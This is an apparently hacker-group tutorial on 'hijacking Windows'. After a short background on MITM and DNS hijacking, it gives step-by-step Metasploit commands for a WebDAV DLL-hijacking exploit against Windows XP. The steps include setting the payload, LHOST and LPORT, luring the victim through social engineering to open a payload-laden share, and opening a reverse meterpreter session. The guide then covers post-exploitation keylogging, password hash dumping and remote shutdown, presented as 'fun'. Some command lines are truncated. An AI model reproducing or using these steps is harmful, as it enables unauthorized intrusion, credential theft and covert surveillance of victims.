Hijacking Windows PDF

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Greetz :

H4x0R 5uD!P ( D1617 64 ), Th3 cr3aT0r ,SsilentIntruder

,D-Intruder , ix_WarRior,Cyb3r Inj3ct0r, TOXCIFI3D
Hax0r, HEARTOFSILICON ,KidD3 H@ck3r,DevIl
SP33D ,Lon3ly H4cK3r, Phoenix64 ,Bl4cK 34gl3, lequid
3xploit3r ,N-coder, 73rm!n470r h4cker, 0Ut Sid3r, And All
Members Of Team InDI hEx

Indian Cyber Police:AP3X , HACK0 , C0D3 INJ3CT0R ,YASH,CODED32



Un_N0n Antil0g
Team Indihex


Indian Cyber Police (Core Member)

[#] ~ Team Indihex ->


[#] ~ Indian Cyber police ->


This Book will Tell you some Basics of
Hijacking exploits that are present in Back|
Hijacking is one of most interesting way To
break into some security of website or
Windows Os.

[#] ~ What is Hijacking ?

Hijacking is a type of network security attack in which the
attacker takes control of a communication - just as an airplane
hijacker takes control of a flight - between two entities and
masquerades as one of them. In one type of hijacking (also
known as a man in the middle attack), the perpetrator takes
control of an established connection while it is in progress. The
attacker intercepts messages in a public key exchange and then
retransmits them, substituting their own public key for the
requested one, so that the two original parties still appear to be
communicating with each other directly. The attacker uses a
program that appears to be the server to the client and appears
to be the client to the server. This attack may be used simply to
gain access to the messages, or to enable the attacker to
modify them before retransmitting them.

Another form of hijacking is browser hijacking, in which a user is

taken to a different site than the one the user requested. There
are two different types of domain name system (DNS) hijacking.
In one, the attacker gains access to DNS records on a server
and modifies them so that requests for the genuine Web page
will be redirected elsewhere - usually to a fake page that the

attacker has created. This gives the impression to the viewer

that the Web site has been compromised, when in fact, only a
server has been. In February 2000, an attacker hijacked RSA
Security's Web site by gaining access to a DNS server that was
not controlled by RSA. By modifying DNS records, the attacker
diverted requests to a spoof Web site. It appeared to users that
an attacker had gained access to the actual RSA Web site data
and changed it - a serious problem for a security enterprise.
This type of hijacking is difficult to prevent, because
administrators control only their own DNS records, and have no
control over upstream DNS servers. In the second type of DNS
hijack, the attacker spoofs valid e-mail accounts and floods the
inboxes of the technical and administrative contacts.

[#] ~ Hijacking Windows.

Now , our real topic starts
So , i will perform this exploit on Windows xp.
You can try it on Windows vista , Windows 7 Too.

I am using Back|Track R2 KDE .

Target is -> Windows XP machine.

So Time to start the real Work.

[#]~ Exploit working .

The exploit i am using is Webdav_dll_hijacker.
Location of exploit in back|Track ->

Well , so whats DLL here , there are certain files in

Windows that depend upon DLL. When you open
A file like .txt it opens in notepad , But certain

Files Required DLL to run , So if theres no DLL

present with them , then it goes in
windows/system32 to Get that specified DLL.
In this case , Metasploit will substitute that DLL
files , so Exploit could work. So there fore as a
HIJACKING takes place.
Normally , windows try to find DLL present in Same
folder which program your running , but if its not
there , it will goto system32 Etc.
So this discussion show kinda nature of this
We will substitute the DLL which windows wants
to the DLL which Back|Track sends.

So , what your waiting for ?

Start Your BACK|TRACK .
So guys Lets Do it.


So for this attack ,
1 -> Open Terminal , type in Msfconsole.
Msfconsole is a part of Metasploit , which is pre
Installed in back track.

2 - > when Msfconsole will be Started, Type in


3-> So Now ,
Type set payload
This will Set your payload

4 -> Type in Set basename (enter any name here)

Basename is name given to files , which are used
for Hijacking.

5-> Type in
Set extensions wab txt grp vcf p7c
Then Press Enter.


6-> Type in
Set LHOST (Your IP here).

7-> Type in
Set srvhost (Your IP here).
Then Press Enter.

8->Type in
Set LPORT 7777.
Then Enter.

9-> Finally , Everthing is ready.

Now , Time to Attack.
Type in Exploit
Then Press Enter.

As you can see in Screenshot , Server has started.

Now , time For Some Soical engg.
If you Know What i mean :P .

Now , you can clearly see , when exploit is started ,

it gives address , where the Infected files are
available for Attacks.
for Example :- \\\documents\
Now , using some Soical engg. skills , Make Victim

To open that link in his/her Windows.

When He/She opens it , some files appear .
that files contain PAYLOAD , which will start , when
double clicked on it

Five files appear , name contact.

i have used basename = contact.
so , this files have PAYLOAD in it. When double
clicked , it starts thus session open in back | track.

After Double clicking on it

You can clearly see , meterpreter Session is

Now , its time to have some fun :P

Now Type in

Sessions i 1

Then Press Enter.

Now , Type in Help .
This is will show , commands available .
so you can execute them.
Its a great fun using them


1 - ifconfig
To see Ip config and info
2- Keyscan_start
It will start a keylogger , that will moniter all key
strokes on the targets Machine.
3- Keyscan_Dump
It will dump all key strokes captured.

4- Keyscan_stop
It will Stop capturing Keystrokes.

5 - Hashdump

It will dump All hashes Present in Target Machine.

6- Shutdown
It will shutdown Targets machine.

There Are Many Commands available .

Try them all.



[#] ~Un_N0n Antil0g ~ > LOGGING OUT

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